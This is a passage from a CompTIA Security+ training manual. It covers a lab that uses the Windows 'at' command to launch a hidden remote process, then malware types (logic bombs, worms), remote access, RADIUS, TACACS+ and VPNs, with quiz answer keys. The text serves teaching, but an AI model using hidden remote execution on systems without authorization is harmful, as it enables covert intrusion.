at \\server-x <time> /interactive "notepad.exe" The command at \\server-x 3:49p /interactive notepad.exe, for example, will launch notepad within an interactive window at 3:49 PM on Server-X.

7 Enter the following command:


at \\server-x <time> "notepad.exe" The command at \\server-x 3:49p notepad.exe, for example, will launch notepad in a background process at 3:49 PM on Server-X. Omitting the /interactive switch launches a process that is hidden from your partner.

Attacks and malicious code 8 At Server-X , after the time specified in the command lapses, check Windows Task Manager and view the processes

347

9 Check the Server-X desktop for the Notepad application 10 Close Task Manager and Notepad on Server-X and the command window on Server-Y

You'll see Notepad is running on the server.

348

CompTIA Security+ Certification

Logic bombs
Explanation Another category of malicious code is known as a logic bomb. A logic bomb is a set of computer instructions that lie dormant until triggered by a specific event. That event can be almost anything, such as opening a document, launching a program, pressing a key a certain number of times, or an action that the computer has taken. Once the logic bomb is triggered, it performs a malicious task. Logic bombs might reside within stand-alone programs as Trojan horses or they might be part of a computer virus. This makes them almost impossible to detect until after they are triggered and the damage is done. Logic bombs are often the work of former employees. One logic bomb caused a companys computerized accounting system to be corrupted. It was triggered by an instruction to check the corporate salary database every three months; if the programmers name was not found, the logic bomb was instructed to launch. Another logic bomb was the work of an independent computer consultant hired to write a program. His intention was to return after the logic bomb was triggered and be paid a large consulting fee to fix the problem. On personal computers, a prominent type of logic bomb is known as a macro virus. A macro virus uses the auto-execution feature of the specific application programs, such as Microsoft Word. Whenever Word is launched, the virus is triggered and performs a malicious act.

Worms
Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious activity on the Internet. The release of the Code Red worm in the summer of 2001, which was shortly followed by Code Red II and Nimda, brought about a sea of change in the type of attacks that security administrators need to fend off. Although the term worm has a few different commonly used meanings, the classic worm or real worm is defined as a self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicates itself to that system. Unlike viruses, true worms do not infect other executable programs, but instead install themselves on the victim computer system as a stand-alone entity that does not require the execution of an infected application. Melissa The term e-mail worm has also been informally used to mean a virus that spreads through external network connections, emphasizing the threat posed by mass mailing viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail worm and most famous virus to date. Melissa gained notoriety in March of 1999 as the first virus to send mass e-mails of itself by using recipients in a users address book. Code Red Although e-mail worms have become a common and very prevalent threat to networks, true worms such as Code Red have become even more common, accounting for 80% of all malicious activity on the Internet and bringing e-commerce networks to a standstill. Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS 4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then scanned for the IIS vulnerability. If the worm found a target system with the vulnerability, it executed the buffer overflow exploit, which resulted in the worms code being loaded onto and executed by the victim system.

Attacks and malicious code

349

The worm then began to propagate itself from the newly compromised machine. After two hours, the worm changed the servers Web page. The Code Red worm also tried to perform a denial-of-service attack on the IP address of www.whitehouse.gov, but the threat was averted by simply changing the domains IP address. Since Code Red did not store itself on any files, the worm could be removed from infected systems simply by rebooting the machine; however, servers would remain vulnerable to the attack and could be reinfected with Code Red until system administrators applied the necessary security patch provided by Microsoft. Although Code Red was programmed to go dormant shortly after its release, its successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS servers over a year after their release. Countermeasures The method of true worms is to exploit known vulnerabilities in order to spread themselves; the key defense against these attacks is for system administrators to ensure all servers are patched with the latest security updates. Since Nimda can exploit a vulnerability in Internet Explorer to run an executable in a Web page or e-mail message without user intervention, system administrators must keep abreast of security issues affecting their users desktop computers and ensure the required security patches are installed. Network and host based intrusion detection systems (IDS) are also critical components needed to secure a network against remote attacks such as Code Red. Host-based IDS can detect unauthorized system activity and stop it before the server is infected. Network-based IDS can detect the signatures of known worms as well as the malicious activity generated by those worms and can notify system administrators as well as instruct routers and firewalls to block traffic from the offending hosts. To protect against worm attacks that are propagated via e-mail, a comprehensive antivirus system should be implemented. Make sure users have their e-mail set so it does not preview a message when selected. Instead, users should have to double-click the message and only then if they recognize the sender.

350
Do it!

CompTIA Security+ Certification

H-3:

Understanding software exploitation

Questions and answers


1 What is a buffer overflow?
A buffer overflow is an attack where the software fills the allocated memory and starts overwriting areas of memory reserved for other processes. It results in application crashes, operating system crashes, or a situation where the attacker can cause his own code to be executed on the system.

2 What is the difference between a virus and a worm?


A virus is a self-replicating program that spreads by infecting other programs. A worm is a self-contained program that uses security flaws to compromise the victim and replicate itself to that system.

3 The Windows Server 2003 at command is a backdoor. True or false?


True: If used to install malicious code on a target system.

Attacks and malicious code

351

Unit summary: Attacks and malicious code


Topic A In this topic, you learned that Denial-of-service (DoS) attacks are a family of attack methods that interrupt network services for legitimate users. You learned that an SYN flood prevents users from accessing a target server by flooding it with half-open TCP connections, and that the Smurf attack overwhelms a host with ICMP packets. You also learned about the Ping of Death, which uses IP packet fragmentation techniques to crash remote systems, as well as Distributed Denial of Service attacks, which manipulate multiple hosts to carry out a DoS attack on a target. In this topic, you learned that man-in-the-middle attacks refer to a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session. The key to this concept is that both hosts think they are communicating with the other when they are in fact communicating with the attacker. In this topic, you learned that spoofing is pretending to be someone else by imitating or impersonating that person in order to gain access to a network. There are four primary types of spoofing that are issues for the information security professional: IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing. In this topic, you learned about replay attacks, where attackers listen to and repeat messages from a legitimate user in order to impersonate the user and gain access to systems. In this topic, you learned about TCP session hijacking, where an attacker tries to make the victim believe that he or she connected to a trusted host, when in fact the victim is communicating with the attacker. In this topic, you learned about social engineering attacks and why they can be so effective in obtaining a password or other valuable information from unsuspecting victims. In this topic, you learned that malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. In this topic, you learned about software exploitation. You learned that the primary difference between the various types of malware is their means of spreading.

Topic B

Topic C

Topic D

Topic E

Topic F

Topic G

Topic H

Review questions
1 Distributed denial-of-service attacks can involve which of the following? (Choose all that apply.)
A

Zombies

B Birthday attack
C

Handlers

D TFN2K

352

CompTIA Security+ Certification 2 Which of the following correctly outlines the normal setup of a TCP session? A ACK, SYN, SYN/ACK B SYN, ACK, RST
C

SYN, SYN/ACK, ACK

D ACK, RST, SYN/ACK 3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:
Item CodeRedII Trin00 BO2K Stacheldracht Melissa Type Virus Tool Backdoor Tool Virus

4 ARP poisoning affects which of the following? (Choose all that apply.) A Hostname-to-IP address resolutions
B

IP address-to-MAC address resolutions

C Domain name resolution D Authentication requests 5 Man-in-the-middle attacks can be accomplished using which of the following?
A

ICMP redirects

B NetBus C ARP spoofing D Replay attacks 6 Denial-of-service (DoS) attacks is a family of attack methods that make target systems unavailable to their legitimate users. True or false?
True

7 The SYN flood attack exploits the nature of the TCP three-way ______________.
Handshake

8 What are IP fragmentation attacks and how do they work?


These attacks misuse ICMP. These attacks craft a very large IP packet and send it to the victim fragment by fragment. Once the collected fragments exceed the 65,535 byte size limit, the victims host crashes.

9 Pings are used to establish whether a remote host is reachable. True or false?
True

Attacks and malicious code

353

10 A well-known exploit that uses IP Packet fragmentation techniques to crash remote systems is called: A Spoofing B Smurf
C

Ping of Death

D ARP poisoning 11 Smurf is a non-OS specific attack that uses the network to amplify its effect on the victim. True or false?
True

12 The best defense against a replay attack is:


An anti-replay feature that makes each packet unique.

13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all internal routers. True or false?
True

14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or false?
True

15 What are three strategies for cryptanalysis?


Cyphertext-only, known plaintext attack, chosen plaintext attack

16 The _____________ attack is used to find collisions of hash functions.


Birthday

17 A _________________ __________________ is a program that poses as something else, causing the user to willingly inflict the attack on himself or herself.
Trojan horse

354

CompTIA Security+ Certification

41

Unit 4 Remote access


Unit time: 120 minutes Complete this unit, and youll know how to:
A Explain the different communications

mediums for remote access and issues surrounding them.


B Describe the IEEE 802.1X, RADIUS, and

TACACS+ authentication systems.


C Describe VPN technology and its tunneling

protocols.
D Identify the different vulnerabilities

associated with telecommuting.

42

CompTIA Security+ Certification

Topic A: Securing remote communications


Explanation Networks have become ubiquitous in todays interconnected world. Access to these networks from remote locations has also boomed. As the trend towards telecommuting grows, so has the risk associated with increased exposure. Open-air networks, equipped with mobile phones, PDAs, and wireless NICs, are vulnerable to snooping and denial of service attacks. Personal firewalls and antivirus scanners provide limited protection as telecommuters access e-mail and Internet messaging services over open cable and public telephone lines. Hackers tools and how-to manuals abound on the Internet, within easy reach of script kiddies. The task of the security specialist is to identify all communications mediums whereby remote users can communicate with their home office, identify their potential vulnerabilities, and then take precautionary measures to safeguard the confidentiality, integrity, and accessibility of data.

Communications mediums
The communication medium describes the physical connection between the remote computer and your network. These include: Dial-up connections Integrated Services Digital Networks (ISDN) Digital Subscriber Lines (DSL) Cable modems Dial-up connections Public Switched Telephone Network (PSTN) connections (also called dial-up connections) use analog modems and standard telephone lines to transmit data. They rely on Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) to dial up and connect to a remote access server. (PPP is a data link protocol that provides dialup access over serial lines. It provides password protection and authentication using the PAP or the stronger CHAP protocols. SLIP is an older data link protocol and has been largely replaced by PPP.) PSTN connections are the cheapest means of data communications, although lack of a local ISP can run up some expensive long-distance bills. Speeds range up to 56 Kbps. From a security standpoint, telephone lines are difficult to sniff, but are susceptible to war dialing. This is an attack where the perpetrator dials all telephone numbers within a specific neighborhood, records those that have modem connections then redials into the system in an attempt to break into the computer. ISDN Integrated Services Digital Network (ISDN) is a telecommunications standard for transmitting voice, video, and data over digital lines. Like PSTN, it relies on SLIP and PPP to communicate. ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B channels, or bearer channels, which can be combined to create higher bandwidth, to carry voice and data. It provides a separate 16 Kbps D channel, or delta, channel for control signals.

Remote access

43

The D channel is used to signal the telephone company computer to make calls, put them on hold, and activate features such as conference calling and call forwarding. It also receives information about incoming calls, such as the identity of the caller. ISDN also offers two high-end services: Primary Rate Interface (PRI) is geared for business customers. The North American and Japanese implementation provides 23 64-Kbps B channels and one 64 Kbps D channel for control signals. The European implementation provides 30 B channels and one D channel. Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell switching with rates above 155 Mbps to transport data, voice, and video on a single circuit. ISDN is noticeably faster than analog modems but significantly slower than DSL connections. Unlike DSL, it can be installed in almost any location. DSL Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper telephone lines for high-speed Internet access. DSL technology is available in several forms, collectively referred to as xDSL. Transmission speeds range between 384 Kbps for Internet uploads and 1.54 Mbps for downloads. DSL must be installed within a 5.5 km (18,000 ft.) radius of the phone companys access point. The faster the connection, the closer the subscriber must be to the access point. DSL is more expensive than analog connectivity options. One security issue concerning DSL is that the network connection is always on until the system is switched off or unplugged from the network. This leaves the system vulnerable to hackers. Cable modem A cable modem is an external device that allows your computer to connect to the Internet through a cable TV wire. The cable runs from your neighborhood to a central location, referred to as the headend. Additional equipment is installed there that communicates to all the cable modems in subscribers homes. Cable modems translate radio frequency (RF) signals to and from the cable plant into Internet Protocol (IP). For those who can get it in their area, cable modem service has quickly become a popular high-speed alternative due to competitive costs and very high speeds; however, there are some drawbacks. Since this is a shared server, bandwidth diminishes as more local users simultaneously access the Internet. In addition, as the connection to the Internet is always open, the system is vulnerable to attacks by hackers.

Protecting the network


The solution to securing remote access to a network is twofold: Authenticate users Authentication mechanisms include IEEE 802.1X, Remote Authentication Dial-In User Service (RADIUS), and Terminal Access Controller Access Control System (TACACS+). Encrypt data flows Encryption mechanisms include Point-to-Point Tunneling Protocol (PPTP), Layer Two Tunneling Protocol (T2TP), IP Security protocol (IPSec), and Secure Shell (SSH).

44
Do it!

CompTIA Security+ Certification

A-1:

Reviewing communications mediums

Questions and answers


1 Dial-up connections use _________ and _______ protocols to dial up and connect to a remote access server.
SLIP, PPP

2 What are some of the vulnerabilities of phone lines?


They are susceptible to war dialing.

3 What are some of the drawbacks to using cable modems?


Bandwidth diminishes as more local users simultaneously access the Internet. As the connection to the Internet is always open, the system is vulnerable to attacks by hackers.

4 Which ISDN channel is used to carry voice and data? A


B

Channel A Channel B Delta channel BRI channel

C D

5 PPP uses _______ and ________ protocols to authenticate users.


A

PAP and CHAP PSTN and SLIP SLIP and PAP DSL and ISDN

B C D

Remote access

45

Topic B: Authentication
This topic covers the following CompTIA Security+exam objective:
# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies 802.1x TACACS (Terminal Access Controller Access Control System) Radius

Security protocols
Explanation When a corporation adds remote users to their corporate network, it faces a new range of security issues: the users are communicating over an open line, or using remote access applications over the Internet. This enables an unauthorized user to snoop or launch replay and man-in-the-middle attacks against the network. Authenticating remote users requires additional security measures to ensure data is protected over an unsecured communication medium. First, usernames and passwords must be encrypted. Second, corporate policies, including access control lists, must be maintained. Finally, all communications must be monitored and logged for auditing purposes. The following security protocols provide solutions to these issues: IEEE 802.1X Remote Authentication Dial-In User Service (RADIUS) Terminal Access Controller Access Control System (TACACS+)

IEEE 802.1X
Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for communication between two computers using a serial interface, typically a personal computer connected by phone line to a server. Once the connection is established, PPP can negotiate an authentication protocol to authenticate the user. The traditional authentication method has been either PAP or CHAP, although PAP is not considered secure. Extensible Authentication Protocol (EAP) extended the capabilities of PPP to encompass a range of new authentication methods, including token cards, one-time passwords, certificates, and biometrics. It describes standards to ensure compatibility and interoperability between the remote user, an access point or switch, and an authentication server, such as RADIUS. EAP deals exclusively with the authentication process. IEEE 802.1X provides a standard for authenticating and controlling user traffic to a protected network. It does not provide the actual authentication mechanism, but instead uses the EAP protocol to define how authentication takes place.

46

CompTIA Security+ Certification There are several forms of EAP offering different levels of security and support for wired and wireless LANs: EAP over IP (EAPoIP) EAP over LAN (EAPOL) Message Digest Algorithm/Challenge-Handshake Authentication Protocol (EAP-MD5-CHAP) Transport Layer Security (EAP-TLS) Tunneled Transport Layer Security (EAP-TTLS) RADIUS Light Extensible Authentication Protocol 9 (LEAP) Cisco IEEE 802.1X conversation Depending on the version of EAP running, the authentication exchange will vary. The following exchange describes a wireless LAN using 802.1X: 1 A client (known as the supplicant) tries to connect to a wireless access point (known as the authenticator). 2 The access point (authenticator) detects the client and enables the clients port. It forces the port into an unauthorized state, so only 802.1X traffic is forwarded. All other traffic, such as HTTP, DHCP, and POP3 packets are blocked. 3 The supplicant sends an EAP-start message. 4 The authenticator sends an EAP-request identity message requesting the users identity. 5 The supplicant sends the identity to the authenticator. 6 The authenticator forwards the identity to the authentication server. The authentication server might use RADIUS, although 802.1X does not specify it. 7 The authentication server authenticates the user. The result is either an accept or a reject packet. 8 The authentication server returns the result to the authenticator. 9 Upon receiving the accept packet, the authenticator opens the clients port for other types of traffic. 10 At logoff, the client sends an EAP-logoff message. This forces the access point to transition the client port to an unauthorized state. Exhibit 4-1 uses a RADIUS server as an example.

Remote access

47

Exhibit 4-1: IEEE 802.1X conversation For information on the latest developments on IEEE standards, visit the following Web site:
http://www.ieee.org

48
Do it!

CompTIA Security+ Certification

B-1:

Discussing IEEE 802.1X

Questions and answers


1 The point of authentication for remote access to a central LAN is usually some type of network access server. True or false?
True

2 PPP establishes a link between remote systems. True or false?


True

3 EAP is the acronym for _____________________. A B


C

Extended Authorization Protocol Extended Authentication Protocol Extensible Authentication Protocol Extensible Administrative Protocol

4 EAP supports multiple authentication methods including:


A B C

One-time passwords Certificates Token cards Shared keys

5 What are the three components in the 802.1X authentication exchange?


A

Supplicant, authenticator, authenticating server RADIUS client, authenticator, authenticating server Supplicant, RADIUS server, authenticating server Supplicant, ISP, authenticator

B C D

Remote access

49

Remote Authentication Dial-In User Service


Explanation Remote Authentication Dial-in User Service (RADIUS) provides a centralized system for authentication, authorization, and accounting. It is widely deployed in remote access networks to authenticate users. RADIUS has two components: a RADIUS client, which is typically a network access server such as a dial-up server, VPN server, or wireless access point, and a RADIUS server. The RADIUS client is located at a remote site; the server is located on the corporate LAN. All user authentication and network service access information is located on the RADIUS server. This information is contained in a variety of formats suitable to the users requirements. RADIUS in its generic form can authenticate users against a UNIX password file, Network Information Service (NIS), as well as a separately maintained RADIUS database. Authentication with a RADIUS server The RADIUS client sends authentication requests to the RADIUS server and acts on responses sent back by the server. RADIUS authenticates users through a series of communications between the client and the server using the User Datagram Protocol (UDP). After a user is authenticated, the client provides that user with access to the appropriate network services. 1 Using any of the remote access methods, the user connects to the RADIUS client, which is also a network access server (NAS). After the connection is established, the RADIUS client prompts the user for a name and password. 2 From this information, the RADIUS client creates a data packet called the access request. This packet includes information identifying the specific RADIUS client sending the access request, the port that is being used for the connection, and the username and password. 3 For protection from eavesdropping hackers, the RADIUS client encrypts the password using a shared secret. 4 The access request is sent over the network to the RADIUS server. 5 When the access request is received, the RADIUS server validates the request and then decrypts the data packet using its shared secret to access the username and password information. This information is passed on to the appropriate security system being supported. This could be a UNIX password file, Kerberos, or even a custom-developed security system. 6 If the username and password are correct, the server sends an access accept message that includes information on the users network system and service requirements. For example, the RADIUS server tells the RADIUS client that a user needs TCP/IP, PPP, or SLIP to connect to the network. The acknowledgment can even contain filtering information to limit a users access to specific resources on the network. 7 If, at any point in this logon process, conditions are not met, the RADIUS server sends an access reject to the RADIUS client, and the user is denied access to the network. To ensure that requests from unauthorized users are not answered, the RADIUS server sends an authentication key, or signature, identifying itself to the RADIUS client.

410

CompTIA Security+ Certification 8 After this information is received by the NAS, it enables the necessary configuration to deliver the right network services to the user. This process is shown in Exhibit 4-2.

Exhibit 4-2: RADIUS Benefits The distributed approach to network security provides a number of benefits: Greater security The RADIUS client/server architecture allows all security information to be located in a single, central database, instead of scattered around a network in several different devices. A single UNIX system running RADIUS is much easier to secure and manage than several communications servers located throughout a network. Scalable architecture RADIUS creates a single, centrally located database of users and available services, a feature particularly important for networks that include large modem banks and more than one remote communications server. The RADIUS server manages the authentication of the user and the access to services from one location. Any device that supports RADIUS can be a RADIUS client, so a remote user can gain access to the same services from any communications server communicating with the RADIUS server. Open protocols RADIUS is fully open, is distributed in source code format, and can be adapted to work with systems and protocols already in use. This feature potentially saves tremendous amounts of time by allowing organizations to modify the RADIUS server to fit their network rather than rework their network to incorporate the NAS. RADIUS can be modified for use with most security systems on the market and works with any communications device that supports the RADIUS client protocol. The RADIUS server has modifiable stubs which enable customers to customize it to run with most security technologies.

Remote access

411

Future enhancements As new security technology becomes available, the customer can take advantage of that security without waiting for added support to the NAS. The new technology need only be added to the RADIUS server by the customer or an outside resource. RADIUS also uses an extensible architecture, which means that as the type and complexity of service the NAS is required to deliver increases, RADIUS can be expanded to provide those services. Do it!

B-2:

Authenticating with a RADIUS server

Questions and answers


1 The RADIUS client/server architecture allows all security information to be located in a single, central database. True or false?
True

2 RADIUS supports most communication and security technologies. True or false?


True

3 RADIUS is not expandable. True or false?


False: It is expandable.

4 Which of the following cannot be used as a RADIUS client? A B C


D

VPN server Wireless access point Network access server Windows workstation

5 Which services are provided by RADIUS? (Choose all that apply.)


A B C

Authentication Auditing Authorization Tunneling

412

CompTIA Security+ Certification

Terminal Access Controller Access Control System


Explanation The Terminal Access Controller Access Control System (TACACS+) is an authentication protocol developed by Cisco Systems to address the need for a scalable authentication solution. It is the third generation of TACACS protocols: the original protocol, TACACS, did not provide accounting functions. This was replaced by XTACACS, which separated the functions of authentication, authorization, and accounting. TACACS+ is a proprietary version and an entirely new protocol. TACACS+ conversation When a user attempts to remotely access a central LAN, the user sends an authorization request to the TACACS+ server. The server then sends a reply asking for the username. The user inputs a username, and this is sent to the TACACS+ server, which then requests a password. The user inputs a password, which is verified against a database by the TACACS+ server. If successful, the authentication portion of the logon process is complete. At this point, the users computer negotiates with the TACACS+ server what the authorization settings are. While this happens, the TACACS+ server records the activities being performed by the remote user into a database for future security audits if necessary. The process for client-side tunneling is shown in Exhibit 4-3.

Exhibit 4-3: TACACS+

Remote access Comparing TACACS+ and RADIUS

413

TACACS+ uses TCP for its transport (unlike RADIUS, which uses UDP). TCP offers several advantages over UDP, primarily a connection-oriented transmission. RADIUS uses UDP, so it requires additional functions such as retransmit attempts and time-outs to compensate for the connectionless transmission. Using TCP offers a separate acknowledgement that a request has been received within the network, regardless of how loaded or slow the authentication mechanism might be. It also provides immediate indication of a crashed server because acknowledgements would not be forthcoming. While RADIUS only encrypts the password in the packet that is passed from client to server, TACACS+ encrypts the entire body of the packet including username, authorized services, and other information. RADIUS combines the authentication and authorization packets, it is difficult to separate these functions. TACACS+ separates authentication, authorization, and accounting, which allows for separate authentication solutions: a user can logon using a Kerberos server for authentication and a TACACS+ server for authorization and accounting.
If students are not familiar with the protocols, you can briefly describe them.

Another advantage to using TACACS+ is that it offers multiple protocol support while RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections cannot be supported by RADIUS. TACACS+ is able to support all of these protocols.

414
Do it!

CompTIA Security+ Certification

B-3:

Enabling dial-in access Heres why


You are logged in as Administrator. Windows Server 2003 does not allow dial-in access by default. In order to allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis.

Heres how
1 Click Start 2 Right-click My Computer

Choose Manage 3 Expand Local Users and Groups Select Users 4 Double-click Administrator 5 Activate the Dial-in tab Select Allow access

Under Remote Access Permission (Dial-in or VPN), as shown here.

Click OK 6 Double-click User1 and repeat step 5 7 Double-click User2 and repeat step 5 8 Close the Computer Management window

Remote access Do it!

415

B-4:

Discussing authentication protocols

Questions and answers


1 TACACS+ cannot support AppleTalk Remote Access, NetBIOS Frame Protocol Control, Novell Asynchronous Services Interface, and X.25 PAD connections. True or false?
False: TACACS+ can support all these protocols.

2 Which of the following authentication protocols is geared toward wireless networks? A


B

TACACS+ 802.1X PPP RADIUS

C D

3 Which authentication protocol uses TCP for transport?


TACACS+

416

CompTIA Security+ Certification

Topic C: Virtual private networks


This topic covers the following CompTIA Security+exam objective:
# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies VPN (Virtual Private Network) L2TP / PPTP (Layer Two Tunneling Protocol / Point to Point Tunneling Protocol) SSH (Secure Shell) IPSEC (Internet Protocol Security)

Types of VPNs
Explanation A virtual private network (VPN) is a tool that enables the secure transmission of data over unsecured networks, such as the Internet. Remote sites and users are able to access their network information as if using a private network (hence the name virtual private network) without the costs associated with long-distance calls or leased lines. A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling enables a foreign protocol to travel across a network by encapsulating (wrapping) it inside the packets of the host network. The security protocols supply an additional level of security by encrypting the data before transmission. There are two types of VPN commonly used in corporate networks: Site-to-site VPN Remote access VPN

Site-to-site VPN
Site-to-site VPNs allow a corporation to connect to branch offices or other companies over a public network. Each site requires a VPN gateway (dedicated hardware or a router running VPN server software) to connect to the Internet. The gateway-to-gateway architecture logically operates as a WAN, connecting offices through multiple private tunnels across the Internet. All locations must use identical encryption and encapsulation protocols and settingsPPTP, L2TP and IPSec are the most common. Each local area network connects to the Internet with a router. In order to receive incoming calls, the corporate hub router employs dedicated lines to permanently connect to a local ISP for incoming calls; branch offices might use either dedicated lines or dial-up. In both cases, the routers establish a secure tunnel across the Internet.

The protocols listed here are discussed later in this Unit.

Remote access

417

Remote access VPN


Companies that have many telecommuting employees will use remote access VPNs, also called virtual private dial-up networks (VPDNs), to communicate long-distance. The only cost involved is that of a local phone call to a local provider. The immediate savings over the use of long-distance and toll-free calls can quickly recoup the startup cost of implementing a VPN. Equipment Remote access VPNs can use a wide variety of communication modes, including analog lines, ISDN lines, digital subscriber lines (DSL) and cable modems. The corporate network has a VPN access point or server that is permanently connected to the Internet and configured to accept incoming calls. The client is equipped with VPN client software and has Internet access through an ISP. Both client and server must be running the same encryption and encapsulation protocols. There are many versions of VPN client software available to establish this type of connectivity. Perhaps the most prominent and widely used is Microsoft L2TP/IPSec VPN Client, which is included in Microsoft Windows XP, NT 4.0, 2000 and Server 2003. This feature has the capability of configuring modems and other remote access devices as VPN adapters. For Microsoft Windows 2000 and Windows Server 2003 servers, the VPN Server software is already built into the product. Operation To establish a remote access VPN, the client uses a local Internet service provider (ISP) to connect to the Internet. The client then starts the VPN client software, which creates a virtual connection to the access point or corporate network. This allows the Internet service provider to act merely as a transporter of a data stream that has been encrypted prior to the initial transmission, as shown in Exhibit 4-4.

Exhibit 4-4: Client-side tunneling An alternative to installing or configuring the client computer to initiate the necessary security communications is to outsource the VPN to a service provider. With this type of configuration, there is no need for the company to maintain client-side software or configurations. When implementing this type of solution, however, encryption does not happen until the data reaches the providers network.

418

CompTIA Security+ Certification This results in an unsecured connection from the users computer to the providers network access server, as shown in Exhibit 4-5. This also places the responsibility of protecting corporate access to information with an external entity.

Exhibit 4-5: Service provider tunneling In this scenario, remote users dial in to a service providers network or point of presence (POP) via a local or toll-free number. The service provider, in turn, initiates a secure encrypted tunnel to the corporate network. If security is of a high concern, this type of implementation might not be the best choice.

VPN drawbacks
Cost benefits and flexibility aside, using VPNs does have its problems. VPN devices are not completely fault tolerant although there are efforts underway to address this issue. In addition, there are diverse choices when implementing VPNs. Software solutions tend to have trouble processing the multitude of simultaneous connections that occur on a large network. This problem can be mitigated by using a hardware solution, but that requires a much higher cost. Its also important to remember there is no such thing as absolute security. As more security is added to a network, project costs increase, and simplicity suffers according to a law of diminishing returns each incremental increase in security over a certain point becomes more and more expensive. A proper balance in these issues must be determined and maintained. Do it!

C-1:

Configuring a Windows Server 2003 VPN server Heres why

Heres how
This activity takes place only at Server-X.

1 On Server-X, click Start Choose Administrative Tools, Routing and Remote


Access

2 Right-click the server name Choose Configure and


Enable Routing and Remote Access

To configure the server. The Routing and Remote Access Server Setup Wizard will begin.

Click Next

Remote access 3 Select Remote Access (dialup or VPN)

419

Click Next 4 Check VPN Click Next


Assist students with this step, if necessary.

The Remote Access window appears.

5 Select the network interface that connects this server to the Internet Click Next 6 Click Next 7 Click Next

This machine has two NICs installed.

To accept the default of automatically assigning IP addresses to remote clients To accept the default value of No, use Routing and Remote Access to authenticate connection requests. To start the Routing and Remote Access service. If prompted about configuring the DHCP Relay Agent.

8 Click Finish 9 Click OK


Explain to students they will connect to this VPN server from Server-Y in a later activity.

10 Close the Routing and Remote Access window

420
Do it!

CompTIA Security+ Certification

C-2:

Understanding VPNs

Questions and answers


1 Tunneling is accomplished by _____________ the data packets within the packets of the host network. A
B

authenticating encapsulating decrypting encrypting

C
D

2 Explain the difference between site-to-site and remote access VPNs.


Site-to-Site VPNs connect branch offices to the corporate network over the Internet using VPN gateways, in essence creating a WAN. Remote access VPNs are used to connect mobile users to the corporate network. The remote users must use a VPN client software to connect to the ISP, and then establish a tunnel.

Remote access

421

Tunneling protocols
Explanation Tunneling hides or encapsulates the original packet inside a new packet. The new packet has new addressing and routing information, which enables it to travel across networks. When the new packet arrives at the destination network, the tunneling protocols are stripped away, exposing the original packet. Two commonly used tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two Tunneling Protocol (L2TP). Point-to-Point Tunneling Protocol (PPTP) The Point-to-Point Tunneling Protocol (PPTP) protocol is built upon the wellestablished Internet protocols of PPP (Point-to-Point Protocol) and Transmission Control Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption and compression of data sent over analog telephone lines. TCP/IP provides a transport mechanism for conveying digital data over the Internet infrastructure. When a user phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP connection but then repackaged for transport over the Internet. This process uses tunneling. In the case of data sent over phone lines, the original data packets are encapsulated within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2). PPTP then encrypts and encapsulates the PPP packets within IP datagrams for transmission through the Internet. PPTP does much more than deliver messages. After a PPTP link has been established, it provides its users with a virtual node on the corporate LAN or WAN. PPTP uses Microsoft point-to-point encryption (MPPE) to encrypt the data packets, and an authentication protocol such as PAP or CHAP to verify users identities before granting access to the corporate network. PPTP employs TCP packets to perform status inquiry and signaling over the network. The control packets are transmitted over a separate control channel and perform the following tasks: Query the status of communications servers Provide in-band management Allocate channels and places outgoing calls Notify Windows NT/2000/Server 2003 servers of incoming calls Transmit and receive user data with bi-directional flow control Notify Windows NT/2000/Server 2003 servers of disconnected calls Assure data integrity, while making the most efficient use of network bandwidth by tightly coordinating the packet flow Layer Two Tunneling Protocol (L2TP) Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25, Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. LT2P uses UDP to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec, to encrypt the data frames. Authentication is accomplished using TACACS+ or RADIUS.

422

CompTIA Security+ Certification The following is a comparison of L2TP and PPTP:


Feature Encryption L2TP No native encryption relies on other encryption protocols, such as IPSec. PPTP Native PPP encryption, not compatible with IPSec. Encrypts data, but negotiations sent in plaintext. Authentication RADIUS, TACACS+ Computer-level authentication uses certificate infrastructure, and userlevel uses PPP authentication. Data protocols Control port IP, IPX, SNA, NetBEUI UDP 1701 Standard PPP authentication using PAP, CHAP or MS-CHAP protocols.

IP only TCP 1723

IP Security protocol
